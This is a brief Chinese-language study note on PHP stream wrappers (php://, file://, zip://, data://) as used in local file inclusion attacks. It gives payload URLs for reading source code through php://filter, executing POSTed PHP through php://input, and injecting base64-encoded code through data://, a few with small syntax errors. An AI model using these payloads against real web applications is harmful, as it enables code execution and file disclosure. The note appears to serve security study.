<aside> 💡
伪协议种类
</aside>
**1 file:// — 访问本地文件系统
2 http:// — 访问 HTTP(s) 网址
3 ftp:// — 访问 FTP(s) URLs
4 php:// — 访问各个输入/输出流(I/O streams)
5 zlib:// — 压缩流
6 data:// — 数据(RFC 2397)
7 glob:// — 查找匹配的文件路径模式
8 phar:// — PHP 归档
9 ssh2:// — Secure Shell 2
10 rar:// — RAR
11 ogg:// — 音频流
12 expect:// — 处理交互式的流**
<aside> 💡
php://
</aside>
名称 | 描述 |
---|---|
resource=<要过滤的数据流> | 这个参数是必须的。它指定了你要筛选过滤的数据流。 |
read=<读链的筛选列表> | **该参数可选。可以设定一个或多个过滤器名称,以管道符(` |
write=<写链的筛选列表> | **该参数可选。可以设定一个或多个过滤器名称,以管道符(` |
<;两个链的筛选列表> | 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。 |
**php://filter/read=convert.base64-encode/resource=index.php
//读取PHP源文件php://filter/resource=index.php
//访问原始数据只读,插入一句话木马执行php://input 然后在post中<?php phpinfo() ?>
//访问原始数据只读,插入一句话木马执行**
<aside> 💡
file://
</aside>
**?file=file://C:phpinfo.txt //用于访问本地系统**
<aside> 💡
zip://
</aside>
**?file=zip://file.zip%23phpinfo.txt**
**zip://中只能传入绝对路径。
要用#分隔压缩包和压缩包里的内容,并且#要用url编码%23(即下述POC中#要用%23替换)
只需要是zip的压缩包即可,后缀名可以任意更改。
相同的类型的还有zlib://和bzip2://**
<aside> 💡
data://
</aside>
**?file=data:text/plain:base64.PD9waHAKcGhwaW5mbygpOwo/Pg==
?file=data:text/plain;<?php phpinfo():?>
?file=data://text/plain:base64,PD9waHAKcGhwaW5mbygpOwo/Pg==**